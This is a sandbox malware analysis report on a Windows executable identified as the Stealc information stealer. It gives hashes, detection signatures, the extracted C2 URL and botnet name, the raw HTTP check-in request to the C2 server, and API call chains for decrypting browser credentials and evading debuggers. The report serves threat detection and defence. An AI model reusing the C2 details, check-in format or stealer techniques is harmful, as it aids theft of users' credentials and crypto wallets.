Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
nGmqbXROga.exe

Overview

General Information

Sample name:nGmqbXROga.exe
renamed because original name is a hash value
Original sample name:0f103ba48d169f87b6d066ca88bc03c1.exe
Analysis ID:1543218
MD5:0f103ba48d169f87b6d066ca88bc03c1
SHA1:c0a175142d2b0793c653be23b83a4df2a0c9fc1c
SHA256:925c5c0d232f0b735e1eb0823890fe8b40c01d93f976a58ec605f36997c25079
Tags:exeStealcuser-abuse_ch
Infos:

Detection

Stealc
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Machine Learning detection for sample
Searches for specific processes (likely to inject)
AV process strings found (often used to terminate AV products)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Extensive use of GetProcAddress (often used to hide API calls)
Found evaded block containing many API calls
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
One or more processes crash
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • nGmqbXROga.exe (PID: 7312 cmdline: "C:\Users\user\Desktop\nGmqbXROga.exe" MD5: 0F103BA48D169F87B6D066CA88BC03C1)
    • WerFault.exe (PID: 7460 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7312 -s 1060 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
{"C2 url": "http://194.15.46.65/7f031eb0d257b290.php", "Botnet": "LogsDiller"}
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security
    SourceRuleDescriptionAuthorStrings
    00000000.00000002.1884509350.0000000002BE3000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
      00000000.00000002.1884483895.0000000002BB9000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
      • 0x1678:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
      00000000.00000003.1704751466.0000000004830000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
        00000000.00000002.1883260883.0000000000400000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_StealcYara detected StealcJoe Security
          00000000.00000002.1884696969.00000000047E0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
            Click to see the 3 entries
            SourceRuleDescriptionAuthorStrings
            0.3.nGmqbXROga.exe.4830000.0.unpackJoeSecurity_StealcYara detected StealcJoe Security
              0.2.nGmqbXROga.exe.47e0e67.2.unpackJoeSecurity_StealcYara detected StealcJoe Security
                0.3.nGmqbXROga.exe.4830000.0.raw.unpackJoeSecurity_StealcYara detected StealcJoe Security
                  0.2.nGmqbXROga.exe.400000.0.raw.unpackJoeSecurity_StealcYara detected StealcJoe Security
                    0.2.nGmqbXROga.exe.47e0e67.2.raw.unpackJoeSecurity_StealcYara detected StealcJoe Security
                      Click to see the 1 entries
                      No Sigma rule has matched
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-10-27T13:07:05.026460+010020442431Malware Command and Control Activity Detected192.168.2.449730194.15.46.6580TCP

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Source: 00000000.00000003.1704751466.0000000004830000.00000004.00001000.00020000.00000000.sdmpMalware Configuration Extractor: StealC {"C2 url": "http://194.15.46.65/7f031eb0d257b290.php", "Botnet": "LogsDiller"}
                      Source: nGmqbXROga.exeReversingLabs: Detection: 36%
                      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                      Source: nGmqbXROga.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\Desktop\nGmqbXROga.exeCode function: 0_2_0040C820 memset,lstrlenA,CryptStringToBinaryA,memcpy,lstrcatA,lstrcatA,lstrcatA,0_2_0040C820
                      Source: C:\Users\user\Desktop\nGmqbXROga.exeCode function: 0_2_00407240 GetProcessHeap,HeapAlloc,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_00407240
                      Source: C:\Users\user\Desktop\nGmqbXROga.exeCode function: 0_2_00409AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_00409AC0
                      Source: C:\Users\user\Desktop\nGmqbXROga.exeCode function: 0_2_00418EA0 CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA,0_2_00418EA0
                      Source: C:\Users\user\Desktop\nGmqbXROga.exeCode function: 0_2_00409B60 CryptUnprotectData,LocalAlloc,memcpy,LocalFree,0_2_00409B60
                      Source: C:\Users\user\Desktop\nGmqbXROga.exeCode function: 0_2_047E74A7 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_047E74A7
                      Source: C:\Users\user\Desktop\nGmqbXROga.exeCode function: 0_2_047E9D27 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_047E9D27
                      Source: C:\Users\user\Desktop\nGmqbXROga.exeCode function: 0_2_047F9107 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,0_2_047F9107
                      Source: C:\Users\user\Desktop\nGmqbXROga.exeCode function: 0_2_047E9DC7 CryptUnprotectData,LocalAlloc,memcpy,LocalFree,0_2_047E9DC7
                      Source: C:\Users\user\Desktop\nGmqbXROga.exeCode function: 0_2_047ECA87 memset,lstrlen,CryptStringToBinaryA,memcpy,lstrcat,lstrcat,lstrcat,0_2_047ECA87

                      Compliance

                      barindex
                      Source: C:\Users\user\Desktop\nGmqbXROga.exeUnpacked PE file: 0.2.nGmqbXROga.exe.400000.0.unpack
                      Source: nGmqbXROga.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: C:\Users\user\Desktop\nGmqbXROga.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                      Source: C:\Users\user\Desktop\nGmqbXROga.exeCode function: 0_2_0040E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_0040E430
                      Source: C:\Users\user\Desktop\nGmqbXROga.exeCode function: 0_2_004138B0 wsprintfA,FindFirstFileA,lstrcatA,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcatA,lstrlenA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_004138B0
                      Source: C:\Users\user\Desktop\nGmqbXROga.exeCode function: 0_2_00414570 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,0_2_00414570
                      Source: C:\Users\user\Desktop\nGmqbXROga.exeCode function: 0_2_00414910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00414910
                      Source: C:\Users\user\Desktop\nGmqbXROga.exeCode function: 0_2_0040ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_0040ED20
                      Source: C:\Users\user\Desktop\nGmqbXROga.exeCode function: 0_2_0040BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_0040BE70
                      Source: C:\Users\user\Desktop\nGmqbXROga.exeCode function: 0_2_0040DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0040DE10
                      Source: C:\Users\user\Desktop\nGmqbXROga.exeCode function: 0_2_004016D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_004016D0
                      Source: C:\Users\user\Desktop\nGmqbXROga.exeCode function: 0_2_0040DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_0040DA80
                      Source: C:\Users\user\Desktop\nGmqbXROga.exeCode function: 0_2_00413EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,0_2_00413EA0
                      Source: C:\Users\user\Desktop\nGmqbXROga.exeCode function: 0_2_0040F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0040F6B0
                      Source: C:\Users\user\Desktop\nGmqbXROga.exeCode function: 0_2_047EE077 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_047EE077
                      Source: C:\Users\user\Desktop\nGmqbXROga.exeCode function: 0_2_047EDCE7 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_047EDCE7
                      Source: C:\Users\user\Desktop\nGmqbXROga.exeCode function: 0_2_047EC0D7 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_047EC0D7
                      Source: C:\Users\user\Desktop\nGmqbXROga.exeCode function: 0_2_047E1937 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_047E1937
                      Source: C:\Users\user\Desktop\nGmqbXROga.exeCode function: 0_2_047EF917 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_047EF917
                      Source: C:\Users\user\Desktop\nGmqbXROga.exeCode function: 0_2_047F4107 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_047F4107
                      Source: C:\Users\user\Desktop\nGmqbXROga.exeCode function: 0_2_047EE697 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_047EE697
                      Source: C:\Users\user\Desktop\nGmqbXROga.exeCode function: 0_2_047F4B77 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_047F4B77
                      Source: C:\Users\user\Desktop\nGmqbXROga.exeCode function: 0_2_047F3B17 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_047F3B17
                      Source: C:\Users\user\Desktop\nGmqbXROga.exeCode function: 0_2_047F47D7 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_047F47D7
                      Source: C:\Users\user\Desktop\nGmqbXROga.exeCode function: 0_2_047EEF87 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_047EEF87

                      Networking

                      barindex
                      Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49730 -> 194.15.46.65:80
                      Source: Malware configuration extractorURLs: http://194.15.46.65/7f031eb0d257b290.php
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 194.15.46.65Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /7f031eb0d257b290.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GIJECGDGCBKECAKFBGCAHost: 194.15.46.65Content-Length: 217Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 49 4a 45 43 47 44 47 43 42 4b 45 43 41 4b 46 42 47 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 41 41 43 39 38 42 42 32 42 42 38 33 39 34 36 30 39 38 34 33 32 0d 0a 2d 2d 2d 2d 2d 2d 47 49 4a 45 43 47 44 47 43 42 4b 45 43 41 4b 46 42 47 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 4c 6f 67 73 44 69 6c 6c 65 72 0d 0a 2d 2d 2d 2d 2d 2d 47 49 4a 45 43 47 44 47 43 42 4b 45 43 41 4b 46 42 47 43 41 2d 2d 0d 0a Data Ascii: ------GIJECGDGCBKECAKFBGCAContent-Disposition: form-data; name="hwid"8AAC98BB2BB83946098432------GIJECGDGCBKECAKFBGCAContent-Disposition: form-data; name="build"LogsDiller------GIJECGDGCBKECAKFBGCA--
                      Source: Joe Sandbox ViewASN Name: VENUS-INTERNET-ASGB VENUS-INTERNET-ASGB
                      Source: unknownTCP traffic detected without corresponding DNS query: 194.15.46.65
                      Source: unknownTCP traffic detected without corresponding DNS query: 194.15.46.65
                      Source: unknownTCP traffic detected without corresponding DNS query: 194.15.46.65
                      Source: unknownTCP traffic detected without corresponding DNS query: 194.15.46.65
                      Source: unknownTCP traffic detected without corresponding DNS query: 194.15.46.65
                      Source: unknownTCP traffic detected without corresponding DNS query: 194.15.46.65
                      Source: unknownTCP traffic detected without corresponding DNS query: 194.15.46.65
                      Source: unknownTCP traffic detected without corresponding DNS query: 194.15.46.65
                      Source: C:\Users\user\Desktop\nGmqbXROga.exeCode function: 0_2_00404880 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlenA,lstrlenA,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_00404880
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 194.15.46.65Connection: Keep-AliveCache-Control: no-cache
                      Source: unknownHTTP traffic detected: POST /7f031eb0d257b290.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GIJECGDGCBKECAKFBGCAHost: 194.15.46.65Content-Length: 217Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 49 4a 45 43 47 44 47 43 42 4b 45 43 41 4b 46 42 47 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 41 41 43 39 38 42 42 32 42 42 38 33 39 34 36 30 39 38 34 33 32 0d 0a 2d 2d 2d 2d 2d 2d 47 49 4a 45 43 47 44 47 43 42 4b 45 43 41 4b 46 42 47 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 4c 6f 67 73 44 69 6c 6c 65 72 0d 0a 2d 2d 2d 2d 2d 2d 47 49 4a 45 43 47 44 47 43 42 4b 45 43 41 4b 46 42 47 43 41 2d 2d 0d 0a Data Ascii: ------GIJECGDGCBKECAKFBGCAContent-Disposition: form-data; name="hwid"8AAC98BB2BB83946098432------GIJECGDGCBKECAKFBGCAContent-Disposition: form-data; name="build"LogsDiller------GIJECGDGCBKECAKFBGCA--
                      Source: nGmqbXROga.exe, 00000000.00000002.1884509350.0000000002BE3000.00000004.00000020.00020000.00000000.sdmp, nGmqbXROga.exe, 00000000.00000002.1884426333.0000000002BAE000.00000004.00000020.00020000.00000000.sdmp, nGmqbXROga.exe, 00000000.00000002.1884509350.0000000002C1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://194.15.46.65
                      Source: nGmqbXROga.exe, 00000000.00000002.1884509350.0000000002BE3000.00000004.00000020.00020000.00000000.sdmp, nGmqbXROga.exe, 00000000.00000002.1884509350.0000000002C1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://194.15.46.65/
                      Source: nGmqbXROga.exe, 00000000.00000002.1884509350.0000000002C1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://194.15.46.65/6XFZ
                      Source: nGmqbXROga.exe, 00000000.00000002.1884509350.0000000002C1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://194.15.46.65/75
                      Source: nGmqbXROga.exe, 00000000.00000002.1884509350.0000000002C1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://194.15.46.65/7f031eb0d257b290.php
                      Source: nGmqbXROga.exe, 00000000.00000002.1884509350.0000000002C39000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://194.15.46.65/7f031eb0d257b290.php2
                      Source: nGmqbXROga.exe, 00000000.00000002.1884509350.0000000002C1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://194.15.46.65/7f031eb0d257b290.php:=
                      Source: nGmqbXROga.exe, 00000000.00000002.1884509350.0000000002C1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://194.15.46.65/7f031eb0d257b290.phpj=
                      Source: nGmqbXROga.exe, 00000000.00000002.1884509350.0000000002C1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://194.15.46.65/7f031eb0d257b290.phpo
                      Source: nGmqbXROga.exe, 00000000.00000002.1884509350.0000000002C1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://194.15.46.65/7f031eb0d257b290.phpv=
                      Source: nGmqbXROga.exe, 00000000.00000002.1884426333.0000000002BAE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://194.15.46.65Da
                      Source: Amcache.hve.3.drString found in binary or memory: http://upx.sf.net

                      System Summary

                      barindex
                      Source: 00000000.00000002.1884483895.0000000002BB9000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                      Source: 00000000.00000002.1884696969.00000000047E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                      Source: C:\Users\user\Desktop\nGmqbXROga.exeCode function: String function: 004045C0 appears 317 times
                      Source: C:\Users\user\Desktop\nGmqbXROga.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7312 -s 1060
                      Source: nGmqbXROga.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: 00000000.00000002.1884483895.0000000002BB9000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                      Source: 00000000.00000002.1884696969.00000000047E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                      Source: nGmqbXROga.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: classification engineClassification label: mal100.troj.evad.winEXE@2/5@0/1
                      Source: C:\Users\user\Desktop\nGmqbXROga.exeCode function: 0_2_00419600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00419600
                      Source: C:\Users\user\Desktop\nGmqbXROga.exeCode function: 0_2_00413720 CoCreateInstance,MultiByteToWideChar,lstrcpyn,0_2_00413720
                      Source: C:\Users\user\Desktop\nGmqbXROga.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\WL733YSN.htmJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7312
                      Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\f15d8fdd-d17d-49bf-93ac-480b7b4d1cc8Jump to behavior
                      Source: nGmqbXROga.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: C:\Users\user\Desktop\nGmqbXROga.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: nGmqbXROga.exeReversingLabs: Detection: 36%
                      Source: unknownProcess created: C:\Users\user\Desktop\nGmqbXROga.exe "C:\Users\user\Desktop\nGmqbXROga.exe"
                      Source: C:\Users\user\Desktop\nGmqbXROga.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7312 -s 1060
                      Source: C:\Users\user\Desktop\nGmqbXROga.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\nGmqbXROga.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Users\user\Desktop\nGmqbXROga.exeSection loaded: msimg32.dllJump to behavior
                      Source: C:\Users\user\Desktop\nGmqbXROga.exeSection loaded: msvcr100.dllJump to behavior
                      Source: C:\Users\user\Desktop\nGmqbXROga.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\nGmqbXROga.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Users\user\Desktop\nGmqbXROga.exeSection loaded: rstrtmgr.dllJump to behavior
                      Source: C:\Users\user\Desktop\nGmqbXROga.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Users\user\Desktop\nGmqbXROga.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\nGmqbXROga.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\Desktop\nGmqbXROga.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\nGmqbXROga.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\nGmqbXROga.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\nGmqbXROga.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\nGmqbXROga.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\Desktop\nGmqbXROga.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\user\Desktop\nGmqbXROga.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\nGmqbXROga.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\nGmqbXROga.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\Desktop\nGmqbXROga.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\Desktop\nGmqbXROga.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\Desktop\nGmqbXROga.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                      Source: C:\Users\user\Desktop\nGmqbXROga.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior

                      Data Obfuscation

                      barindex
                      Source: C:\Users\user\Desktop\nGmqbXROga.exeUnpacked PE file: 0.2.nGmqbXROga.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:EW;.rdata:R;.data:W;.reloc:R;
                      Source: C:\Users\user\Desktop\nGmqbXROga.exeUnpacked PE file: 0.2.nGmqbXROga.exe.400000.0.unpack
                      Source: C:\Users\user\Desktop\nGmqbXROga.exeCode function: 0_2_00419860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00419860
                      Source: C:\Users\user\Desktop\nGmqbXROga.exeCode function: 0_2_0041B035 push ecx; ret 0_2_0041B048
                      Source: C:\Users\user\Desktop\nGmqbXROga.exeCode function: 0_2_02BBBCB1 push 7DD07DC0h; iretd 0_2_02BBBCC2
                      Source: C:\Users\user\Desktop\nGmqbXROga.exeCode function: 0_2_02BBEC94 push eax; ret 0_2_02BBECA3
                      Source: C:\Users\user\Desktop\nGmqbXROga.exeCode function: 0_2_02BBEC85 push eax; ret 0_2_02BBECA3
                      Source: C:\Users\user\Desktop\nGmqbXROga.exeCode function: 0_2_047FB29C push ecx; ret 0_2_047FB2AF
                      Source: nGmqbXROga.exeStatic PE information: section name: .text entropy: 7.491298542432688
                      Source: C:\Users\user\Desktop\nGmqbXROga.exeCode function: 0_2_00419860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00419860
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
